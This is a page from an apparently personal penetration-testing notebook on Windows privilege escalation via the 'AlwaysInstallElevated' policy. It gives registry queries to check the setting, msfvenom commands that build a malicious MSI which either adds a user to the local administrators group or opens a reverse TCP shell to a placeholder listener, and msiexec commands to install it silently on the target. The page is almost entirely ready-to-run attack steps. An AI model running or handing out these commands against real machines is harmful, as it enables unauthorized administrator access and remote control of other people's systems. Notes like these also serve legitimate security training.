Hack$Notes
Search…
Hack$Notes
Enumeration
Transferring Files
Metasploit Framework
Reverse Shells
Buffer Overflow
Spawning a Shell
Password Attacks
Privilege Escalation
Windows
Kernel Exploits
Stored Credentials
Unquoted Service Path
Always Install Elevated
Weak Permissions
Schedule Tasks
AutoRun Executables
Startup Apps
Passwords
Win PrivEsc Tools
Linux
Port Forwarding
Tools / Techniques
Resources
Powered By GitBook
Always Install Elevated
Always Install Elevated

Check with:

1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
From the output, notice that "AlwaysInstallElevated" value is 1. This needs to be on both to be exploited.

Steps:

1
# Generate payload to add user to admin group
2
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
3
4
OR
5
6
# Create a reverse shell
7
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi
8
9
# Run it on the target machine:
10
msiexec /quiet /qn /i setup.msi
11
msiexec /quiet /qn /i reverse.msi <--- Needs a netcat listener
Copied!
Previous
Unquoted Service Path
Next
Weak Permissions
Last modified 1yr ago
Copy link
Contents
Check with:
Steps: